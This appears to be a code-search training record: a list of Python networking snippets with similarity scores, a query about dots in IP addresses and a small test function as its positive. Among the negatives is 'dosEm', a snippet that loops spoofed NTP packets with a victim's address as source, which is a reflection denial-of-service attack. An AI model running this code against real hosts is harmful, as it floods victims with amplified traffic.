<b>\")[-1].split(\"</b>\")[0]\n return data.strip()", "def change_host(self, str_cef, address):\r\n tmp = str_cef\r\n if str_cef.find(\"CEF:\",0,len(str_cef)) != -1:\r\n tmp = str_cef[:21] + str(address[0]) + str_cef[25:]\r\n\r\n elif str_cef.find(\"|\",0,len(str_cef)) != -1:\r\n st = str_cef.find(\"|\",0,len(str_cef))\r\n st = str_cef.find(\"|\",st+1,len(str_cef))\r\n tmp = str_cef[:st+1]+str(address[0])+\"|\"+str_cef[st+1:]\r\n return tmp", "def ip(self, ip: str):\n\n self._ip = ip", "def get_ip_string():\n return netifaces.ifaddresses('br0')[netifaces.AF_INET][0]['addr']", "def ip_pad(ippart,fillupper=False):\n sp=ippart.split('.')\n fill='0'\n if fillupper:\n fill='255'\n \n quads=[]\n for part in sp:\n if part=='':\n continue\n quads.append(str(part))\n \n while len(quads)<4:\n quads.append(fill)\n \n return '.'.join(quads)", "def get_local_host_ip(self) -> str:", "def request_new_ip(self, mac):\n self.execute_script('new_ip', mac)", "def sendMessage(self, data, (host, port)):\n\t\tdef send_to_ip(IPaddrs):\n\t\t\tself.transport.write(data, (IPaddrs, port))\n\t\t\tself.resolvedAdrs[host] = IPaddrs\n\t\ttry:\n\t\t\tself.transport.write(data, (self.resolvedAdrs[host], port))\n\t\texcept KeyError, e:\n\t\t\t# Resolve and call the send function\n\t\t\treactor.resolve(host).addCallback(send_to_ip)", "def generateIPAddress(base, subnet, host, mask):\n\n addr = str(base)+'.'+str(subnet)+'.' 
+ str(host)\n if mask != None:\n addr = addr + '/' + str(mask)\n return addr", "def _send(self, what, value, address='localhost:502', **kwargs):\n\n colon_index = address.find(':')\n IP = '-i {} '.format(address[:colon_index])\n PORT = '-p {} '.format(address[colon_index+1:])\n # NOTE: following data is validated by client script\n MODE = '-m {} '.format('w')\n TYPE = '-t {} '.format(what[0])\n OFFSET = '-o {} '.format(what[1]) # NOTE: 0-based\n\n # NOTE: value is a list of bools or ints when write multiple times\n if 'count' in kwargs and kwargs['count'] > 1:\n count = kwargs['count']\n COUNT = '--count {} '.format(count)\n else:\n count = 1\n COUNT = '--count {} '.format(count)\n\n # NOTE: value is a int when writing to a register\n if what[0] == 'HR':\n if count == 1:\n VALUE = '-r {} '.format(value)\n else:\n VALUE = '-r '\n for v in value:\n VALUE += str(v)\n VALUE += ' '\n\n # NOTE: value is a bool when writing to a coil\n elif what[0] == 'CO':\n if count == 1:\n if value == True:\n VALUE = '-c {} '.format(1)\n else:\n VALUE = '-c {} '.format(0)\n else:\n VALUE = '-c '\n for v in value:\n if v == True:\n VALUE += str(1)\n else:\n VALUE += str(0)\n VALUE += ' '\n else:\n raise ValueError('IR and DI are read only data.')\n\n\n cmd = shlex.split(\n self._client_cmd +\n IP +\n PORT +\n MODE +\n TYPE +\n OFFSET +\n COUNT +\n VALUE\n )\n # print 'DEBUG modbus_send cmd shlex list: ', cmd\n\n # TODO: pipe stdout and return the sent value\n try:\n client = subprocess.Popen(cmd, shell=False)\n client.wait()\n\n except Exception as error:\n print('ERROR modbus _send: ', error)", "def format_ethernet(value, mask):\n value_ether = \":\".join(re.findall('..', \"{:012x}\".format(value)))\n if mask is None:\n return value_ether\n value_mask = \":\".join(re.findall('..', \"{:012x}\".format(mask)))\n return \"{}/{}\".format(value_ether, value_mask)", "def sendall(self, s):\r\n self.write(s)", "def send(self, data):\n print \"Attempting to send packet of size %d to %s\" % (len(data), self.hostname)\n self.sock.sendto(data, (self.dst_ip, 0))", "def writer(self):\n #while self.alive:\n try:\n icmpreq = ethernet.Ethernet(src_s=\"dc:a6:32:00:a7:8b\", dst_s=\"ec:84:b4:3e:c8:20\", type=ethernet.ETH_TYPE_IP) +\\\n ip.IP(p=ip.IP_PROTO_ICMP, src_s=\"192.168.1.35\", dst_s=\"172.217.166.110\") +\\\n icmp.ICMP(type=8) +\\\n icmp.ICMP.Echo(id=1, ts=123456789, body_bytes=b\"12345678901234567890\")\n self.serial.write(icmpreq.bin()+b'~')\n except socket.error as msg:\n print(msg)\n self.stop()", "def send(self, val, end=\"\\n\"):\n self.sock.send(to_bytes(\"{val}{end}\".format(val=val, end=end)))", "def ip(self) -> str:\n return pulumi.get(self, \"ip\")", "def send_command(s, IP, PORT, sec, cmd, seq, bits):\n # print(IP, PORT)\n # print(s)\n # s.connect((IP, PORT))\n if sec > 1:\n sleep_time = .03\n else:\n sleep_time = sec / 10\n start = time.time()\n while time.time() < (start + sec):\n print(\"sending\")\n s.sendto(cmd.format(seq, bits).encode('utf-8'), (IP, PORT))\n time.sleep(sleep_time)\n seq += 1\n # s.close()\n return seq" ]
[ "0.63720393", "0.6112773", "0.6034202", "0.6031415", "0.601407", "0.6007722", "0.6005478", "0.5853208", "0.5850585", "0.5793232", "0.57886994", "0.57657415", "0.5760936", "0.5697663", "0.5660143", "0.56552243", "0.564769", "0.5638525", "0.5633917", "0.5625542", "0.56003445", "0.5594275", "0.55898905", "0.55722314", "0.5565514", "0.5558486", "0.5538668", "0.553131", "0.5509549", "0.55075693", "0.55056316", "0.5504903", "0.5501326", "0.5491247", "0.54786354", "0.5477796", "0.54341996", "0.5414625", "0.54069185", "0.5396016", "0.53779346", "0.53536206", "0.5351046", "0.5338247", "0.53316754", "0.53307766", "0.5330326", "0.53183675", "0.5318304", "0.531609", "0.53154784", "0.5308207", "0.5305799", "0.53032804", "0.52919257", "0.5289484", "0.5286316", "0.5282333", "0.5277508", "0.52769274", "0.5255134", "0.52516234", "0.5247481", "0.52459997", "0.5245943", "0.5244896", "0.5240547", "0.52287155", "0.5222877", "0.52219474", "0.52165365", "0.52073145", "0.52009535", "0.5196202", "0.51929575", "0.5191139", "0.51876533", "0.5184147", "0.51835537", "0.5180254", "0.517928", "0.5173474", "0.51717246", "0.51712984", "0.5168659", "0.51667476", "0.51635563", "0.51618224", "0.51618207", "0.5158089", "0.5155758", "0.5153953", "0.51524234", "0.5152147", "0.5150088", "0.51471066", "0.5144671", "0.5143695", "0.513857", "0.5137781", "0.51277834" ]
0.0
-1
Send value without dots in IP
def test_49(self): assert 'False' == Api.requestBlock('test-49', CustomFields=True)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_ip_dotted(self):\r\n return socket.inet_ntoa(struct.pack('>I', self.ip))", "def overlay_ip(ip):\n return \"192.168.{}.{}\".format( *ip.split(\".\")[2:])", "def send(value):\r\n return value", "def safe_addr(ip_addr):\n return '.'.join(ip_addr.split('.')[:2] + ['xxx', 'xxx'])", "def _send(self, what, value, address='localhost:44818', **kwargs):\n\n tag_string = ''\n tag_string = EnipProtocol._tuple_to_cpppo_tag(what, value)\n # print 'DEBUG enip _send tag_string: ', tag_string\n\n cmd = shlex.split(\n self._client_cmd +\n '--log ' + self._client_log +\n '--address ' + address +\n ' ' + tag_string\n )\n # print 'DEBUG enip _send cmd shlex list: ', cmd\n\n # TODO: pipe stdout and return the sent value\n try:\n client = subprocess.Popen(cmd, shell=False)\n client.wait()\n\n except Exception as error:\n print('ERROR enip _send: ', error)", "def defangIPaddr(address):\n address_as_list = list(address)\n length_of_address = len(address_as_list)\n for i in range(length_of_address):\n if address_as_list[i] == \".\":\n address_as_list[i] = \"[.]\"\n return \"\".join(address_as_list)", "def pack_ip(self, str_ip):\n return struct.pack(\">BBBB\", *[ int(c) for c in str_ip.split(\".\") ])", "def ip(self, mess, args):\n return '%s\\n' % urlgrabber.urlread('http://whatismyip.org')", "def ip_triplet(request):\n oip = get_ip(request=request)\n ips = oip.split(\".\")[:-1]\n ip = \".\".join(ips)\n return ip", "def send(self, value):\n pass", "def to_net(self, value):\n return value", "def format_ip(addr):\n return \\\n str(ord(addr[0])) + '.' + \\\n str(ord(addr[1])) + '.' + \\\n str(ord(addr[2])) + '.' + \\\n str(ord(addr[3]))", "def test_clean_ip(self):\n\n raw_ip = 'client=mail-ed1-f51.google.com[209.85.208.51]'\n result = clean_ip(raw_ip)\n self.assertEqual(result, '209.85.208.51')", "def reverse_dotted_decimals(ipaddress):\n return '.'.join(ipaddress.split('.')[::-1])", "def send(self, val, end=\"\\n\"):\n self.sock.send(to_bytes(\"{val}{end}\".format(val=val, end=end)))", "def filter_ip_address(self, string):\n count = string.count('.')\n newstring = string\n if count < 3:\n # Not enough components to matter\n return newstring\n\n dot_split = string.split('.')\n\n # Count the number of components that convert to an integer\n int_count = 0\n for component in dot_split:\n try:\n # Note: _ is pythonic for unused variable\n _ = int(component)\n int_count = int_count + 1\n except ValueError:\n pass\n\n if int_count >= 4:\n # Replace everything\n newstring = string.replace('.', '-')\n\n return newstring", "def send(self, x):\n print x", "def sendingString(self):\n return ''", "def __str__(self):\n return \"{}\".format(visiteur.ip)", "def send(self,message):\n self.transport.write(message, (\"228.0.0.5\", udpbport))", "def test_ip(self):\n ##Todo: Improve this check\n ip = socket.gethostbyname(socket.gethostname())\n ip = [int(i) for i in ip.split('.')]\n assert len(ip) == 4\n assert ip[0] == 10\n assert ip[1] == 137\n assert ip[2] == 1\n assert ip[3] >= 1 and ip[3] <= 255", "def __str__(self):\n \n return self._addr[0] + \":\" + str(self._addr[1])", "def getServerIP():\n # Create a UDP socket at client side\n UDPClientSocket = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)\n UDPClientSocket.settimeout(0.15)\n\n \n for i in ['127.0.0.1']+list(range(0,256)):#iterating through all network IPs....127.0.0.1 is localhost\n try:\n IP=\"192.168.2.\"+str(i) if i!='127.0.0.1' else i #\n print(IP,end=\" \") \n UDPClientSocket.sendto(bytesToSend, (IP, 20001))#send message\n msg,IP = 
UDPClientSocket.recvfrom(bufferSize)#get response\n if (msg==str.encode(ACK_MESSAGE)):\n print()#printed IP wont clear without this command\n cls()#if IP found it clears all the console \n return IP[0]\n except Exception as e:\n print(e)\n \n return 0", "def __str__(self):\n return self.the_ip", "def echo(s_socket):\r\n value = raw_input(\"#> \")\r\n bytes_value = to_bytes(len(value) + 5, 4, 'little')\r\n s_socket.send('d' + bytes_value + value)\r\n print(s_socket.recv(64))", "def ipAddress():\n \n sk = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n sk.connect((\"8.8.8.8\", 80))\n ip = (sk.getsockname()[0])\n sk.close()\n return str(ip)", "def _send(self, p: str, s) -> bytes:\n\n b = self._to_netstring(p.encode('ascii'))\n\n failure = s.sendall(b)\n if failure is not None:\n self._send(p, s)\n return b", "def routepack(value):\n return str(value).replace(\"/\",\"!\")", "def replace_dots(data):\n data = re.sub(':', ' : ', data)\n return data", "def sendValue(self, value):\n\n print(f'Sending: {value}\\n')\n self.ser.write(bytes([value]))\n self.ser.write('\\n'.encode(\"ascii\"))\n\n self.ser.reset_input_buffer()\n ser_bytes = self.ser.read(1)\n print(f'Receiving\\nraw data: {ser_bytes}')\n\n\n #decoded_bytes = (ser_bytes.decode(\"ascii\"))\n\n #print(f'Ascii Value: {decoded_bytes}', flush=True)", "def prepare_value(self, value):\n if value is None:\n return value\n value = value.replace(\" \", \"\").replace(\".\", \"\")\n if value:\n return \"%s.%s.%s.%s\" % (value[0:3], value[3:7], value[7:11], value[11:])\n return value", "def change_ip(sender_socket, ip, port):\n sender_socket.sendto(bytes(\"change ip\", \"UTF-8\"), (ip, port))\n new_ip_str = input(\"New Host IP Address: \")\n sender_socket.sendto(bytes(new_ip_str, \"UTF-8\"), (ip, port))\n sleep(0.5)\n status = sender_socket.recv(BUFFER_SIZE)\n status_message = status.decode(\"UTF-8\")\n if \"IP Address Successfully Changed\" in status_message:\n print(status_message)\n return True\n else:\n print(status_message)\n return False", "def _send(self, what, value, address, **kwargs):\n\n print('_send: please override me.')", "def showIP(ans, ip):\n\tparam = ans.split(\"=\")[1]\n\tprint \"%s\\t\\t http://%s:%s\" % (param, ip, port)", "def ip(self) -> str:\n return pulumi.get(self, \"ip\")", "def sprint_addr(addr: bytes) -> str:\n\n if not len(addr) or not addr:\n return \"\"\n\n return str(ipaddress.ip_address(addr))", "def sendPing(self, payload=None):", "def get_random_ip():\n return \".\".join(str(random.randrange(1, 255)) for i in range(4))", "def genIp():\n ip = \".\".join(str(random.randint(0, 255)) for _ in range(4))\n return ip", "def get_ip_string():\n return netifaces.ifaddresses('br0')[netifaces.AF_INET][0]['addr']", "def get_primary_ip(options, index):\n\n second_octet = 160 + index\n return \"192.%s.1.1\" % second_octet", "def format_ipv4(value, mask=None):\n value_ipv4 = \".\".join([str(int(x, 16)) for x in re.findall('..', \"{:08x}\".format(value))])\n if mask is None:\n return value_ipv4\n value_mask = \".\".join([str(int(x, 16)) for x in re.findall('..', \"{:08x}\".format(mask))])\n return \"{}/{}\".format(value_ipv4, value_mask)", "def get_ip(self):", "def get_local_host_ip(self) -> str:", "def handler(value, provider, **kwargs): # pylint: disable=W0613\n\n ip = requests.get(value).text.strip()\n LOGGER.debug('external IP: %s', ip)\n return ip", "def JP_addr(self, addr):\n\t\tself.IP = addr", "def ip_info():\n return str(getIP())", "def format_ethernet(value, mask):\n value_ether = \":\".join(re.findall('..', 
\"{:012x}\".format(value)))\n if mask is None:\n return value_ether\n value_mask = \":\".join(re.findall('..', \"{:012x}\".format(mask)))\n return \"{}/{}\".format(value_ether, value_mask)", "def set_ip_opt(self, opt, value):\r\n if isinstance(opt, str):\r\n o = globals()[self.ip_opt_prefix+opt]\r\n elif isinstance(opt, list) or isinstance(opt, tuple):\r\n o = globals()[self.ip_opt_prefix+opt[self.v6]]\r\n else:\r\n raise TypeError('opt argument is of wrong type: '+repr(opt))\r\n self.setsockopt(self.ip_proto, o, value)", "def int2ip(n: int) -> str:\n return socket.inet_ntoa(struct.pack(\"!I\", n))", "def get_bot_ip(bot, update):\n sender = update.message.from_user\n if sender.id == Bot.OWNER_ID:\n msg_to_send = \"\"\n try:\n ip_string = check_output([\"curl\", \"ipinfo.io/ip\"],\n universal_newlines=True,\n timeout=5)\n msg_to_send = msgIpAddress + ip_string\n except CalledProcessError:\n msg_to_send = strings.errUnknown\n except TimeoutExpired:\n msg_to_send = strings.errTimeout\n update.message.reply_text(msg_to_send)", "def morseToPubIP(self, address):\n ip_from_morse = address[0];\n port_from_morse = address[1];\n \n ip_from_str = \"0.0.\";\n ip_from_str += str(ord(ip_from_morse[0])) + \".\" + str(ord(ip_from_morse[1]));\n port_from_str = str(ord(port_from_morse));\n \n return ip_from_str, port_from_str;", "def set_host_ip(self, host, host_ip):\n host.setIP(str(host_ip.ip), prefixLen=self.NETPREFIX)", "def test_replace_host_subnet(self):\n pass", "def sendString(self, data):\n self.transport.write(pack(\"!i\",len(data))+data)", "def get_single_net_client_addr (ip_addr, octetListDict = {'3' : 1}, ip_type = 'ipv4'):\n if ip_type == 'ipv4':\n ip_lst = ip_addr.split('.')\n\n for octet,increment in octetListDict.iteritems():\n int_octet = int(octet)\n if ((int_octet < 0) or (int_octet > 3)):\n raise ValueError('the provided octet is not legal in {0} format'.format(ip_type) )\n else:\n if (int(ip_lst[int_octet]) + increment) < 255:\n ip_lst[int_octet] = str(int(ip_lst[int_octet]) + increment)\n else:\n raise ValueError('the requested increment exceeds 255 client address limit')\n\n return '.'.join(ip_lst)\n\n else: # this is a ipv6 address, handle accordingly\n ip_lst = ip_addr.split(':')\n\n for octet,increment in octetListDict.iteritems():\n int_octet = int(octet)\n if ((int_octet < 0) or (int_octet > 7)):\n raise ValueError('the provided octet is not legal in {0} format'.format(ip_type) )\n else:\n if (int(ip_lst[int_octet]) + increment) < 65535:\n ip_lst[int_octet] = format( int(ip_lst[int_octet], 16) + increment, 'X')\n else:\n raise ValueError('the requested increment exceeds 65535 client address limit')\n\n return ':'.join(ip_lst)", "def getnetwork(ipaddr):\n return '192.168.1.0/24'", "def writeNetstring(self,data):\n if self.verbose: \n print \"client:\",data\n prefix = \"%i:\" % len(data)\n \n if len(prefix)+len(data) >= self.MAX_LENGTH:\n raise MessageSizeError()\n \n offset = 0\n lengthToSend = len(prefix)\n while offset < lengthToSend:\n slice = buffer(prefix, offset, lengthToSend - offset)\n amountWritten = self.sock.send(slice)\n offset += amountWritten\n \n offset = 0\n lengthToSend = len(data)\n while offset < lengthToSend:\n slice = buffer(data, offset, lengthToSend - offset)\n if self.verbose:\n print lengthToSend, offset, len(slice), slice\n amountWritten = self.sock.send(slice)\n # print amountWritten\n offset += amountWritten\n \n return self.sock.send(',')", "def sendnum(self, n):\n self.sendline(str(n))", "def ip_to_str(address):\n return 
socket.inet_ntop(socket.AF_INET, address)", "def command(self, value):\n self.tcp_comms.tcp_params.ISO = int(value)\n self.tcp_comms.send_iso(self.tcp_comms.tcp_params.ISO)", "def get_host_string(addr: AddressTupleVXType) -> str:\n if len(addr) >= 3:\n addr = cast(AddressTupleV6Type, addr)\n if addr[3]:\n return \"{}%{}\".format(addr[0], addr[3])\n return addr[0]", "def _send(self, what, value, address='localhost:502', **kwargs):\n\n colon_index = address.find(':')\n IP = '-i {} '.format(address[:colon_index])\n PORT = '-p {} '.format(address[colon_index+1:])\n # NOTE: following data is validated by client script\n MODE = '-m {} '.format('w')\n TYPE = '-t {} '.format(what[0])\n OFFSET = '-o {} '.format(what[1]) # NOTE: 0-based\n\n # NOTE: value is a list of bools or ints when write multiple times\n if 'count' in kwargs and kwargs['count'] > 1:\n count = kwargs['count']\n COUNT = '--count {} '.format(count)\n else:\n count = 1\n COUNT = '--count {} '.format(count)\n\n # NOTE: value is a int when writing to a register\n if what[0] == 'HR':\n if count == 1:\n VALUE = '-r {} '.format(value)\n else:\n VALUE = '-r '\n for v in value:\n VALUE += str(v)\n VALUE += ' '\n\n # NOTE: value is a bool when writing to a coil\n elif what[0] == 'CO':\n if count == 1:\n if value == True:\n VALUE = '-c {} '.format(1)\n else:\n VALUE = '-c {} '.format(0)\n else:\n VALUE = '-c '\n for v in value:\n if v == True:\n VALUE += str(1)\n else:\n VALUE += str(0)\n VALUE += ' '\n else:\n raise ValueError('IR and DI are read only data.')\n\n\n cmd = shlex.split(\n self._client_cmd +\n IP +\n PORT +\n MODE +\n TYPE +\n OFFSET +\n COUNT +\n VALUE\n )\n # print 'DEBUG modbus_send cmd shlex list: ', cmd\n\n # TODO: pipe stdout and return the sent value\n try:\n client = subprocess.Popen(cmd, shell=False)\n client.wait()\n\n except Exception as error:\n print('ERROR modbus _send: ', error)", "def JP_V0_addr(self, addr):\n\t\tself.IP = addr + self.V[0]", "def replace_dot(data):\n data = re.sub(\"[.]\", \" . \", data)\n return data", "def __send__(self,val):\n assert(len(val) == 1)\n assert(type(val) == bytes)\n v = int.from_bytes(val,byteorder=\"little\")\n if(self.verbose):\n pc.color_stdout(\"GREEN\")\n print(\">> %s\\t - %s\\t - %d\"% (hex(v),bin(v),v))\n pc.color_stdout(\"RESET\")\n self.port.write(val)", "def randomIP():\n\tip = \".\".join(map(str, (random.randint(0,255)for _ in range(4))))\n\treturn ip", "def ip_pad(ippart,fillupper=False):\n sp=ippart.split('.')\n fill='0'\n if fillupper:\n fill='255'\n \n quads=[]\n for part in sp:\n if part=='':\n continue\n quads.append(str(part))\n \n while len(quads)<4:\n quads.append(fill)\n \n return '.'.join(quads)", "def longToIp(longIp):\n stringIp = socket.inet_ntoa(struct.pack(\"!L\", longIp))\n return stringIp", "def ip():\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n s.connect((\"8.8.8.8\", 80))\n ip = s.getsockname()[0]\n s.close()\n return ip", "def int_2_ip_str(ip_int):\n return socket.inet_ntoa(struct.pack(\"!I\", ip_int))", "def safe_ip_format(ip):\r\n try:\r\n if netaddr.IPAddress(ip).version == 6:\r\n return '[%s]' % ip\r\n except (TypeError, netaddr.AddrFormatError): # hostname\r\n pass\r\n # it's IPv4 or hostname\r\n return ip", "def ip_white(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"ip_white\")", "def _send(self, data: str):\n try:\n self._sock.sendto(data.encode(\"ascii\"), self._addr)\n except (socket.error, RuntimeError):\n # No time for love, Dr. 
Jones!\n pass", "def ip(self) -> str:\n return self._ip", "def true_sendto(conn, data, address, special=False):\n if special:\n data = pickle.dumps(data)\n else:\n data = data.encode()\n conn.sendto(key.encrypt(data), (address[0], address[1])) # (ip_dst, dport)", "def format_ipv6(value, mask):\n value_ipv6 = \":\".join(re.findall('..', \"{:032x}\".format(value)))\n if mask is None:\n return value_ipv6\n value_mask = \":\".join(re.findall('..', \"{:032x}\".format(mask)))\n return \"{}/{}\".format(value_ipv6, value_mask)", "def generateIPAddress(base, subnet, host, mask):\n\n addr = str(base)+'.'+str(subnet)+'.' + str(host)\n if mask != None:\n addr = addr + '/' + str(mask)\n return addr", "def change_host(self, str_cef, address):\r\n tmp = str_cef\r\n if str_cef.find(\"CEF:\",0,len(str_cef)) != -1:\r\n tmp = str_cef[:21] + str(address[0]) + str_cef[25:]\r\n\r\n elif str_cef.find(\"|\",0,len(str_cef)) != -1:\r\n st = str_cef.find(\"|\",0,len(str_cef))\r\n st = str_cef.find(\"|\",st+1,len(str_cef))\r\n tmp = str_cef[:st+1]+str(address[0])+\"|\"+str_cef[st+1:]\r\n return tmp", "def hex_encode_ip(ip_addr):\n if not ip_addr:\n return None\n\n return base64.b16encode(ip_addr.packed).rjust(32, '0')", "def dosEm(target, ntplist, data, currentserver):\n ntpserver = ntplist[currentserver] #LOAD THE SERVER\n packet = IP(dst=ntpserver,src=target)/UDP(sport=48947,dport=123)/Raw(load=data) #CONSTRUIRE LE PAQUER\n send(packet,loop=1) #ENVOYER ", "def sendTCP_raw_single(m,ip,port):\n s=socket.socket()\n s.settimeout(1)\n s.connect((ip,port))\n s.send(m.data)\n #print (\"RetVal: %s\" % s.recv(1000))\n return s.recv(1000)", "def GetIPAddr():\n cmd = \"ifconfig | awk '/192/ {print $2}'\"\n res = Run(cmd).replace(\"\\n\", \"\") # remove end of line char\n return res.replace(\"addr:\", \"\") # remove \"addr:\" prefix", "def ipwrap(address: Any) -> str:\n try:\n if not isinstance(address, int):\n ipaddress.IPv6Address(address)\n return f\"[{address}]\"\n except ValueError:\n pass\n\n return str(address)", "def handle_hexip(bot, ievent):\n if not ievent.args:\n return ievent.missing('<ip | hex ip>')\n is_a = None\n if _re_hexip.match(ievent.args[0]):\n is_a = 'hexip'\n else:\n try:\n socket.inet_pton(socket.AF_INET, ievent.args[0])\n is_a = 'defip'\n except socket.error:\n pass\n if not is_a:\n ievent.missing('<ip | hex ip>')\n return\n if is_a == 'hexip':\n ip = []\n for i in range(4):\n ip.append(str(int(ievent.args[0][i*2:i*2+2], 16)))\n ip = '.'.join(ip)\n nevent = copy.copy(ievent)\n nevent.args = [ip]\n handle_dns(bot, nevent)\n else:\n test = ievent.args[0].split('.')\n ip = 16777216 * int(test[0]) + 65536 * int(test[1]) + 256 * \\\nint(test[2]) + int(test[3])\n ievent.reply('ip %s = %08x' % (ievent.args[0], ip))", "def _repr_remote(self):\n return \"%s:%d\" % (self.remote_address)", "def _format_senders_reference_20(self, val):\n if val:\n sett_obj = acm.FSettlement[str(val)]\n val = \"%s-%s-%s-%s\" % (get_settlement_reference_prefix(), str(val), str(get_message_version_number(sett_obj)), str(self.swift_message_type[2:5]))\n return val", "def send_protocol_message(self, msg):\n self.conn.send(msg + \"\\0\")", "def AioNodeToIpAddressString(node):\n ip = aio_node_to_ip_address.AioNodeToIpAddress(node)\n return '%d.%d.%d.%d' % (ip.a, ip.b, ip.c, ip.d)", "def gateway(self):\n return ''", "def fill_dots(message):\r\n length = len(message)\r\n power = int(np.ceil(np.log2(length)))\r\n return message + (\".\" * (2**power - length))", "def send(self, value, convergence=False):\n # dump to json format\n data = 
json.dumps(dict({\"gain\" : value, \"convergence\" : convergence})).encode()\n print(\"Sending value {} as data {}\".format(value, data))\n self.sock.sendall(data)", "def routeunpack(value):\n return str(value).replace(\"!\",\"/\")", "def get_ip_type1(self) -> str:\n hex_ip = hexlify(self.message)[152:160]\n ip_addr = int(hex_ip[6:8] + hex_ip[4:6] + hex_ip[2:4] + hex_ip[0:2], 16)\n return inet_ntoa(pack(\"<L\", ip_addr))", "def get_internal_ip(self, external_ip):\n if external_ip[-1:] == '2':\n return external_ip[:-1] + '1'\n else:\n # not a proper ip of a neighbor\n return ''", "def api_myip():\n return request.remote_addr, 200, {'Content-Type': 'text/plain'}", "def to_vxlan(ip_addr):\n return \"192.168.\" + \".\".join(ip_addr.split(\".\")[2:])", "def ip(self, ip: str):\n\n self._ip = ip", "def ip_address(self) -> str:\n return pulumi.get(self, \"ip_address\")", "def _format_senders_correspondent_53A(self, val):\n senders_correspondent_account = val.get('ACCOUNT')\n senders_correspondent_bic = val.get('BIC')\n if senders_correspondent_bic:\n if senders_correspondent_account:\n val = \"/\" + str(senders_correspondent_account) + \"\\n\" + str(senders_correspondent_bic)\n else:\n val = str(senders_correspondent_bic)\n return val", "def host_ip(host):\n return host.cmd('ip addr show {}-eth1 | awk \\'/inet / {{ print $2 }}\\' | cut -d\\'/\\' -f1'.format(host.name, host.name), stdout=sp.PIPE).strip()" ]
[ "0.6917071", "0.61488545", "0.60871255", "0.58816665", "0.58673185", "0.5860521", "0.5847382", "0.5811409", "0.58054906", "0.5722551", "0.5714136", "0.57023436", "0.5676384", "0.56233644", "0.55774444", "0.5576495", "0.554843", "0.5535844", "0.55323035", "0.5489128", "0.54597867", "0.54564595", "0.54387826", "0.5399396", "0.5382818", "0.5381494", "0.5371384", "0.5370731", "0.5370071", "0.5360317", "0.53538465", "0.53252316", "0.5322162", "0.5320388", "0.52622426", "0.525924", "0.52225244", "0.52139664", "0.52002823", "0.5177546", "0.517592", "0.5173895", "0.51590323", "0.51563543", "0.5154231", "0.51465666", "0.5140369", "0.51243603", "0.5110817", "0.51096725", "0.51010984", "0.50928915", "0.50843185", "0.50783074", "0.50748396", "0.50674546", "0.506706", "0.506353", "0.50562644", "0.5054757", "0.50516444", "0.5048651", "0.5045679", "0.5043806", "0.50419575", "0.5041111", "0.5035866", "0.50349796", "0.5030868", "0.5009152", "0.5008586", "0.5007043", "0.5003607", "0.49989814", "0.4995327", "0.4988693", "0.49813434", "0.49765956", "0.4975375", "0.49683517", "0.49669847", "0.49540395", "0.49503505", "0.4949982", "0.49484196", "0.49433756", "0.49420905", "0.49373403", "0.4932384", "0.49281833", "0.49238205", "0.491978", "0.49194634", "0.49140045", "0.49132007", "0.4909109", "0.4909102", "0.49047318", "0.4896553", "0.48964947", "0.4889826" ]
0.0
-1
Send dots in wrong places in IP
def test_50(self): assert 'False' == Api.requestBlock('test-50', CustomFields=True)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_ip_dotted(self):\r\n return socket.inet_ntoa(struct.pack('>I', self.ip))", "def overlay_ip(ip):\n return \"192.168.{}.{}\".format( *ip.split(\".\")[2:])", "def defangIPaddr(address):\n address_as_list = list(address)\n length_of_address = len(address_as_list)\n for i in range(length_of_address):\n if address_as_list[i] == \".\":\n address_as_list[i] = \"[.]\"\n return \"\".join(address_as_list)", "def format_ip(addr):\n return \\\n str(ord(addr[0])) + '.' + \\\n str(ord(addr[1])) + '.' + \\\n str(ord(addr[2])) + '.' + \\\n str(ord(addr[3]))", "def safe_addr(ip_addr):\n return '.'.join(ip_addr.split('.')[:2] + ['xxx', 'xxx'])", "def ip(self, mess, args):\n return '%s\\n' % urlgrabber.urlread('http://whatismyip.org')", "def reverse_dotted_decimals(ipaddress):\n return '.'.join(ipaddress.split('.')[::-1])", "def filter_ip_address(self, string):\n count = string.count('.')\n newstring = string\n if count < 3:\n # Not enough components to matter\n return newstring\n\n dot_split = string.split('.')\n\n # Count the number of components that convert to an integer\n int_count = 0\n for component in dot_split:\n try:\n # Note: _ is pythonic for unused variable\n _ = int(component)\n int_count = int_count + 1\n except ValueError:\n pass\n\n if int_count >= 4:\n # Replace everything\n newstring = string.replace('.', '-')\n\n return newstring", "def ip_triplet(request):\n oip = get_ip(request=request)\n ips = oip.split(\".\")[:-1]\n ip = \".\".join(ips)\n return ip", "def fill_dots(message):\r\n length = len(message)\r\n power = int(np.ceil(np.log2(length)))\r\n return message + (\".\" * (2**power - length))", "def safe_ip_format(ip):\r\n try:\r\n if netaddr.IPAddress(ip).version == 6:\r\n return '[%s]' % ip\r\n except (TypeError, netaddr.AddrFormatError): # hostname\r\n pass\r\n # it's IPv4 or hostname\r\n return ip", "def test_ip(self):\n ##Todo: Improve this check\n ip = socket.gethostbyname(socket.gethostname())\n ip = [int(i) for i in ip.split('.')]\n assert len(ip) == 4\n assert ip[0] == 10\n assert ip[1] == 137\n assert ip[2] == 1\n assert ip[3] >= 1 and ip[3] <= 255", "def pack_ip(self, str_ip):\n return struct.pack(\">BBBB\", *[ int(c) for c in str_ip.split(\".\") ])", "def replace_dots(data):\n data = re.sub(':', ' : ', data)\n return data", "def ip_pad(ippart,fillupper=False):\n sp=ippart.split('.')\n fill='0'\n if fillupper:\n fill='255'\n \n quads=[]\n for part in sp:\n if part=='':\n continue\n quads.append(str(part))\n \n while len(quads)<4:\n quads.append(fill)\n \n return '.'.join(quads)", "def sprint_addr(addr: bytes) -> str:\n\n if not len(addr) or not addr:\n return \"\"\n\n return str(ipaddress.ip_address(addr))", "def morseToPubIP(self, address):\n ip_from_morse = address[0];\n port_from_morse = address[1];\n \n ip_from_str = \"0.0.\";\n ip_from_str += str(ord(ip_from_morse[0])) + \".\" + str(ord(ip_from_morse[1]));\n port_from_str = str(ord(port_from_morse));\n \n return ip_from_str, port_from_str;", "def format_host(host):\n\n host = strip_suffix(host, \".lan.urlab.be\")\n host = strip_suffix(host, \".lan\")\n host = strip_suffix(host, \".local\")\n host = strip_suffix(host, \"iPodtouch\")\n host = strip_suffix(host, \"-PC\")\n host = strip_suffix(host, \"-pc\")\n\n host = strip_prefix(host, \"pc-\")\n host 